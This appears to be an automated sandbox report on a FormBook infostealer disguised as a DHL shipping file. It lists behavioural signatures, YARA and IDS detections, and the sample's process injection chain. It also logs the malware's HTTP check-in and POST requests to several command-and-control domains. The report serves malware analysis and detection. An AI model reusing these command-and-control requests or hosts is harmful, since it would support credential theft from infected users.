Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 30312052024.exe

Overview

General Information

Sample name:DHL 30312052024.exe
Analysis ID:1570258
MD5:e414a371a1be9843ba41ad3b33b1d734
SHA1:9cea807095b000923036736217baabec3af1755e
SHA256:80f9730a0f5124c24863e93b5e6b1b3dc653cc68c12055d9d7309fa636626ae8
Tags:DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL 30312052024.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\DHL 30312052024.exe" MD5: E414A371A1BE9843BA41AD3B33B1D734)
    • svchost.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\DHL 30312052024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FBboLdkGSWBoDSVHPM.exe (PID: 6624 cmdline: "C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7548 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • FBboLdkGSWBoDSVHPM.exe (PID: 4564 cmdline: "C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7840 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 30312052024.exe, ParentProcessId: 7388, ParentProcessName: DHL 30312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ProcessId: 7472, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 30312052024.exe, ParentProcessId: 7388, ParentProcessName: DHL 30312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ProcessId: 7472, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-06T17:43:39.116072+010020507451Malware Command and Control Activity Detected192.168.2.949782154.215.72.11080TCP
            2024-12-06T17:44:13.060877+010020507451Malware Command and Control Activity Detected192.168.2.949865116.50.37.24480TCP
            2024-12-06T17:45:36.259355+010020507451Malware Command and Control Activity Detected192.168.2.94992185.159.66.9380TCP
            2024-12-06T17:45:51.066808+010020507451Malware Command and Control Activity Detected192.168.2.94998691.195.240.9480TCP
            2024-12-06T17:46:14.625193+010020507451Malware Command and Control Activity Detected192.168.2.94999066.29.149.4680TCP
            2024-12-06T17:46:30.078407+010020507451Malware Command and Control Activity Detected192.168.2.949994195.110.124.13380TCP
            2024-12-06T17:47:01.525322+010020507451Malware Command and Control Activity Detected192.168.2.949998217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: DHL 30312052024.exeReversingLabs: Detection: 50%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: DHL 30312052024.exeJoe Sandbox ML: detected
            Source: DHL 30312052024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3800818888.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000000.1605480285.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C6445A
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6C6D1 FindFirstFileW,FindClose,0_2_00C6C6D1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C6C75C
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6EF95
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6F0F2
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C6F3F3
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C637EF
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C63B12
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C6BCBC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0061BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0061BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_00609480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0060DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_02BF053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49865 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49782 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49921 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49990 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49998 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49994 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49986 -> 91.195.240.94:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C722EE
            Source: global trafficHTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?LzY4r=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&F6=SVfTP6Q02ra8s0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 194Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 4c 7a 59 34 72 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 79 59 69 4b 42 38 36 6c 7a 63 5a 6b 61 77 50 58 34 75 59 6e 62 56 47 42 5a 47 Data Ascii: LzY4r=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG
